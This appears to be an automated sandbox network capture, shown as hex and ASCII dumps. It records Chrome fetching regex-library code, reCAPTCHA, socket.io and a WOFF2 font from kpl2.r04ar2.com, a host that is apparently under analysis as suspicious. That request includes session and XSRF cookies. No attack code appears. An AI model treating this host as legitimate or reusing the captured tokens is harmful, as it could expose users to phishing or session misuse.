                                                          Data Ascii: );break;case"D":h.push(a.notInts());break;case"s":h.push(a.whitespace());break;case"S":h.push(a.notWhitespace());break;default:/\d/.test(n)?h.push({type:o.REFERENCE,value:parseInt(n,10)}):h.push({type:o.CHAR,value:n.charCodeAt(0)})}break;case"^":h.push(s.
                                                          2024-08-27 22:11:08 UTC1378INData Raw: 68 26 26 63 28 69 29 2c 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 50 45 54 49 54 49 4f 4e 2c 6d 69 6e 3a 30 2c 6d 61 78 3a 31 2f 30 2c 76 61 6c 75 65 3a 68 2e 70 6f 70 28 29 7d 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 72 65 74 75 72 6e 20 30 21 3d 3d 6c 2e 6c 65 6e 67 74 68 26 26 72 2e 65 72 72 6f 72 28 65 2c 22 55 6e 74 65 72 6d 69 6e 61 74 65 64 20 67 72 6f 75 70 22 29 2c 75 7d 2c 74 2e 65 78 70 6f 72 74 73 2e 74 79 70 65 73 3d 6f 7d 2c 7b 22 2e 2f 70 6f 73 69 74 69 6f 6e 73 22 3a 34 2c 22 2e 2f 73 65 74 73 22 3a 35 2c 22 2e 2f 74 79 70 65 73 22 3a 36 2c 22 2e 2f 75 74 69 6c 22 3a 37 7d 5d 2c 34 3a 5b 66 75
                                                          Data Ascii: h&&c(i),h.push({type:o.REPETITION,min:0,max:1/0,value:h.pop()});break;default:h.push({type:o.CHAR,value:n.charCodeAt(0)})}return 0!==l.length&&r.error(e,"Unterminated group"),u},t.exports.types=o},{"./positions":4,"./sets":5,"./types":6,"./util":7}],4:[fu
                                                          2024-08-27 22:11:08 UTC1378INData Raw: 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 36 35 32 37 39 7d 5d 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 30 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 33 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 32 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 33 7d 5d 7d 3b 6e 2e 77 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 31 7d 7d 2c 6e 2e 6e 6f 74 57 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 30 7d 7d 2c 6e 2e 69 6e
                                                          Data Ascii: r.CHAR,value:65279}]},i=function(){return[{type:r.CHAR,value:10},{type:r.CHAR,value:13},{type:r.CHAR,value:8232},{type:r.CHAR,value:8233}]};n.words=function(){return{type:r.SET,set:a(),not:!1}},n.notWords=function(){return{type:r.SET,set:a(),not:!0}},n.in
                                                          2024-08-27 22:11:08 UTC599INData Raw: 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 34 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 6f 72 64 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 35 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 36 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 37 5d 29 69 2e 70 75 73 68 28 7b 74 79 70 65 3a 72 2e 52 41 4e 47 45 2c 66 72 6f 6d 3a 28 61 5b 38 5d 7c 7c 61 5b 39 5d 29 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 74 6f 3a 61 5b 31 30 5d 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 3b 65 6c 73 65 7b 69 66 28 21 28 73 3d 61 5b 31 32 5d 29 29 72 65 74 75 72 6e 5b 69 2c 75 2e 6c 61 73 74 49 6e 64 65 78 5d 3b 69 2e 70 75
                                                          Data Ascii: hitespace());else if(a[4])i.push(o.notWords());else if(a[5])i.push(o.notInts());else if(a[6])i.push(o.notWhitespace());else if(a[7])i.push({type:r.RANGE,from:(a[8]||a[9]).charCodeAt(0),to:a[10].charCodeAt(0)});else{if(!(s=a[12]))return[i,u.lastIndex];i.pu


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          46192.168.2.449813216.58.206.684431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:08 UTC451OUTGET /recaptcha/api.js HTTP/1.1
                                                          Host: www.google.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:08 UTC749INHTTP/1.1 200 OK
                                                          Content-Type: text/javascript; charset=utf-8
                                                          Expires: Tue, 27 Aug 2024 22:11:08 GMT
                                                          Date: Tue, 27 Aug 2024 22:11:08 GMT
                                                          Cache-Control: private, max-age=300
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                          Server: ESF
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Accept-Ranges: none
                                                          Vary: Accept-Encoding
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          2024-08-27 22:11:08 UTC641INData Raw: 35 39 61 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                          Data Ascii: 59a/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                          2024-08-27 22:11:08 UTC800INData Raw: 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 29 7b 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 2e
                                                          Data Ascii: AACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.
                                                          2024-08-27 22:11:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          47192.168.2.44981518.245.31.54431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:08 UTC359OUTGET /4.6.0/socket.io.min.js HTTP/1.1
                                                          Host: cdn.socket.io
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:08 UTC703INHTTP/1.1 200 OK
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Content-Length: 45806
                                                          Connection: close
                                                          Accept-Ranges: bytes
                                                          Access-Control-Allow-Origin: *
                                                          Cache-Control: public, max-age=31536000, immutable
                                                          Content-Disposition: inline; filename="socket.io.min.js"
                                                          Date: Fri, 05 Jan 2024 09:12:45 GMT
                                                          ETag: "80f5b8c6a9eeac15de93e5a112036a06"
                                                          Server: Vercel
                                                          Strict-Transport-Security: max-age=63072000
                                                          X-Vercel-Cache: HIT
                                                          X-Vercel-Id: fra1::kcxpj-1704445965394-d209ffeb73cf
                                                          X-Cache: Hit from cloudfront
                                                          Via: 1.1 67cd7fbfa7b3b35b6217719b3f0167d2.cloudfront.net (CloudFront)
                                                          X-Amz-Cf-Pop: FRA56-P8
                                                          X-Amz-Cf-Id: qbW3CU2Jbp3JMt0TvoEuMh_2HH3A5G4lDreChB8bWXhNT9rMZpcdtg==
                                                          Age: 20468768
                                                          2024-08-27 22:11:08 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                          Data Ascii: /*! * Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
                                                          2024-08-27 22:11:08 UTC16384INData Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f
                                                          Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
                                                          2024-08-27 22:11:08 UTC13038INData Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68
                                                          Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          48192.168.2.449822188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:09 UTC1448OUTGET /90e3UQoFnPZnefHhdNMQPyz73 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Origin: https://kpl2.r04ar2.com
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: font
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:09 UTC622INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:09 GMT
                                                          Content-Type: font/woff2
                                                          Content-Length: 43596
                                                          Connection: close
                                                          Content-Disposition: inline; filename="90e3UQoFnPZnefHhdNMQPyz73"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mtm%2BJYCXfehg1lm1GT6jpZsiK9rv0%2Ba2PrU1uE8dSwvCuHsL8FVwNOBcWccW%2FMuoUAxmNobk%2FgLZjK6GpSpOKabBqSkXHUwBNqlXU7XqEHMJHI8L6f1eBXAZi8DhhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f654e5c6f42b0-EWR
                                                          2024-08-27 22:11:09 UTC747INData Raw: 77 4f 46 32 00 01 00 00 00 00 aa 4c 00 13 00 00 00 01 cf 50 00 00 a9 d5 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 55 1b 82 e4 7a 1c 8b 04 3f 48 56 41 52 8a 3b 3f 4d 56 41 52 46 06 60 3f 53 54 41 54 1c 00 8e 48 2f 4c 11 08 0a 81 c2 40 81 a5 50 0b 87 3e 00 30 82 8e 00 01 36 02 24 03 8e 78 04 20 05 8d 2e 07 97 7b 5b d6 bb 71 05 b3 c3 e4 8f 52 6c ba 0d 01 b0 74 fa f4 7e 76 f7 0b e8 b1 ed 28 e5 b6 c1 e8 b6 d0 54 c3 74 05 3b f6 14 6e 27 b0 dd 76 3d cc fe ff ff 3f 7f 99 88 6c 5d 02 78 49 92 b5 85 6d 1d 22 a8 ea 3f 68 4e 58 04 2c 02 96 b5 38 1a 3b 47 b4 d6 af cb 6d 2c 7d c1 68 d7 aa 3e 28 3d 5b ac 96 88 6d 2f d4 3e 9b b8 a1 ef 38 26 66 c1 e0 26 9d 06 1b b8 9b ad 91 5d a1 75 95 dd e0 26 9c 56 44 8f e5 5d ec 3c 8d 04 79 52 93 65
                                                          Data Ascii: wOF2LPUz?HVAR;?MVARF`?STATH/L@P>06$x .{[qRlt~v(Tt;n'v=?l]xIm"?hNX,8;Gm,}h>(=[m/>8&f&]u&VD]<yRe
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 8e 20 be ec 62 a6 ec fc 7d 44 49 76 75 d1 71 04 88 0f d8 6b cb 96 34 d2 0c f7 cc 14 40 c0 10 ce d5 ff 50 2a b0 b0 6a dc ed 89 29 f7 ec 94 27 df 4c 97 eb 89 c9 c2 ae b3 dc b1 62 e0 85 52 51 6a 49 2a 49 9b b4 51 6b da 54 ae 6c fa 5f 77 4f 0f d0 92 24 cb 1f e8 08 21 63 cc 2e 25 cb 7b 80 95 5f 4e 90 02 45 40 fc 00 0d 92 41 b0 da 9d f9 3f 9c ee 9a d9 61 57 0b 79 99 67 66 9d 67 1b 26 45 bc 0c f7 20 7e 88 78 f0 62 c5 cc 83 05 b5 62 c1 82 85 7e f8 a7 d6 f4 ef 1e 66 2f 80 a8 0a 1e d0 47 8a 82 b3 9d 4a 1b 36 b2 79 fe b3 df fa 0e 7a 45 40 54 9c 61 aa 30 5e 55 6c f6 df cf 06 00 fc 53 3a c3 bf 92 2c 03 9e 7d 04 1b 42 ec 52 a7 a8 52 74 7e b7 76 d1 85 00 ba 4c 3a 60 34 c1 49 4b 41 1c e6 bd a7 56 a3 ca b1 b7 78 26 40 a1 1f 8f 68 a8 37 83 50 05 fe bd ff dc aa 2a f0 aa 08
                                                          Data Ascii: b}DIvuqk4@P*j)'LbRQjI*IQkTl_wO$!c.%{_NE@A?aWygfg&E ~xbb~f/GJ6yzE@Ta0^UlS:,}BRRt~vL:`4IKAVx&@h7P*
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 99 7d 9e 5d 57 72 91 73 73 4b bc 1c 72 12 ba 1e 36 36 7c 33 22 22 2a 2a 26 26 21 c1 e1 10 c5 bc bc 32 65 90 3a 76 de b1 83 76 d7 75 c7 d1 ff bd fa ef 37 7f f3 ee 97 3e fc ec d3 2f 3e 0d 7f 59 f7 9d e0 41 40 40 00 c8 82 05 10 40 c9 06 6a 8b 76 3f a2 63 04 fc cf bf 1a e0 05 82 e1 03 a0 ae 09 a0 0b f4 c0 a3 aa 1c 80 71 5b ad cd 01 38 80 ba 26 50 ed 76 16 e9 84 82 9d 77 d3 ef ac 8c 5b 06 e0 52 8b 81 00 1e 2c a6 f3 af 20 bc 4c 15 e0 d4 43 23 d6 51 35 b8 91 3c 4e 8d af 4d f0 9a f0 ff 89 98 49 1e c3 96 a1 ef 1e ef ae 41 39 d4 0e be a1 72 98 1c b4 98 29 ef a4 9e 40 7d 80 28 93 fa a9 ef 70 df d3 54 b5 e2 d5 ba 81 b2 f7 81 f6 10 fa 79 c4 7a c4 26 c4 11 70 a2 46 71 8f 62 7e 37 d0 ca bd 8a d4 e0 c1 fc fb 48 b3 d9 1f 86 2f e5 9b 9b b5 38 d8 c7 bd 62 75 22 b3 21 8b 20
                                                          Data Ascii: }]WrssKr66|3""**&&!2e:vvu7>/>YA@@@jv?cq[8&Pvw[R, LC#Q5<NMIA9r)@}(pTyz&pFqb~7H/8bu"!
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 5b 69 7e db 22 51 70 ef 63 32 39 e9 64 71 a7 b5 30 b6 01 15 1a 29 e2 db ce 53 01 4b 24 89 db 11 9c 91 10 7d 9c ef d5 0f e1 38 11 2a 9e 08 b1 c6 95 68 36 08 c4 a8 a2 b4 98 b5 21 8e 45 d0 71 24 18 a7 83 42 25 37 a3 0f 52 82 02 89 71 3b a6 33 e3 76 a8 96 c5 96 00 31 78 04 a8 30 14 19 d5 19 35 da 35 a1 cc 49 64 7a 77 af a4 2d 6a 48 d5 f9 10 15 85 2c 13 a3 9e f6 44 fc 18 de 56 cd 85 7c a5 47 ac 97 c9 a3 b9 57 e1 c4 0a 96 52 70 14 1b 9d cf 6b 27 9f a5 fa bd 08 79 02 2c 96 02 20 16 9d 4d 88 68 fb d6 4a 21 21 6d b6 8c 58 80 8a 4a bd a3 a3 79 25 a6 aa 2e 1a 3d c6 77 60 74 91 90 6a 2a 81 e2 98 32 ad 42 a4 cf 75 c9 16 1c 25 3d 79 6f 32 9f 8e cf 45 7e e6 05 e8 4e 24 f2 4f 2c 8e ab 2d 9c 9c 76 49 bb eb d8 5e de eb 78 af d8 0e f9 43 a9 e0 48 ac ab f8 a8 48 8a aa 81 6a
                                                          Data Ascii: [i~"Qpc29dq0)SK$}8*h6!Eq$B%7Rq;3v1x055Idzw-jH,DV|GWRpk'y, MhJ!!mXJy%.=w`tj*2Bu%=yo2E~N$O,-vI^xCHHj
                                                          2024-08-27 22:11:09 UTC1369INData Raw: e1 b8 20 fc 23 8b 97 28 3f 36 3d bc 0d d8 3d 52 72 fe 9d 98 df f6 99 86 c4 bc 22 f8 09 5a 28 e5 b7 77 89 61 b7 36 f9 53 75 68 4b 1e a3 d9 26 75 d4 2c cc 9b ab c9 a0 c4 be a0 65 70 6a fc 71 23 f4 aa f8 fc 97 90 31 c6 86 3b 8d 2e bf 22 ac c8 63 a8 a4 64 cd 76 00 e5 20 65 ff cf 30 3f a6 13 d2 e5 62 0b a4 27 2d 7d 39 cc f0 e0 9e 1d af b5 ec 6f 86 84 31 96 bb 8e 91 1f de f5 79 ed 91 b4 46 3e b6 fa d8 67 65 be e3 e4 c7 96 8c a1 bb 91 79 70 21 64 5b 43 4a bb 5f ce 7f 6a 9e e2 6c 74 bd 98 84 44 03 65 56 43 e1 02 9a f1 01 c9 b2 0e 5a 9a 74 1e 19 d7 2d 04 6b 89 4f 3e 7f eb 62 e6 73 66 69 2d cd a3 e6 3f 27 75 aa 1d f4 11 10 73 fc 42 d2 5a c5 86 43 23 db 5e 68 e7 7a 4b d7 dd 63 72 dd 6d 59 de 57 ba ed 90 63 7c a6 8b 45 e2 fa ee ae 6f c3 10 c6 8a 94 f0 17 68 c9 28 c5
                                                          Data Ascii: #(?6==Rr"Z(wa6SuhK&u,epjq#1;."cdv e0?b'-}9o1yF>geyp!d[CJ_jltDeVCZt-kO>bsfi-?'usBZC#^hzKcrmYWc|Eoh(
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 03 fe a9 a9 bb 81 48 18 fa 58 6c d7 68 8e c9 73 ff 93 f3 ea 71 72 7c d4 67 35 e2 25 58 ad 9b 53 bb 0e 1a 84 1a b8 82 5e 74 f8 f1 ff 58 67 54 9d 62 90 e9 68 f1 c4 58 64 f4 a7 11 7b 4a 5a 49 91 3e 4e c4 a0 f3 c2 16 05 ca 58 f5 2f 67 94 92 df bd d2 cb da 8d 4e 2f c9 b6 83 3e 5b 35 3d f8 fc e3 65 9c 37 d6 d2 a2 c6 49 f6 ae d8 e1 89 37 ae 63 7d 3f 6f 70 d7 3f 3b 22 5b 75 e5 01 5e 3b bd 02 7a e2 ad bd 31 24 3b ab 34 eb 3d 4b b2 d1 8a eb d4 09 e1 09 bc 2e 7f c6 88 31 51 e6 fa 1c 6a c5 06 7d 66 4a f0 e0 eb c6 48 eb a6 3e de c9 7a 7d 78 4b d7 98 bd e2 c3 08 cd f3 88 6d ff fa 2e f6 41 89 df d6 d2 4a ff 7b f6 01 aa 12 65 af e8 2b 9c 2a 6b b9 21 bb 8c e8 e3 a7 1f ef 6f bf d7 f8 0b 47 b0 c3 71 a6 2e 6c 7f 81 ee 98 c2 d1 a6 7a dd 76 dd d1 70 c9 bf 39 33 37 99 ac 68 8e
                                                          Data Ascii: HXlhsqr|g5%XS^tXgTbhXd{JZI>NX/gN/>[5=e7I7c}?op?;"[u^;z1$;4=K.1Qj}fJH>z}xKm.AJ{e+*k!oGq.lzvp937h
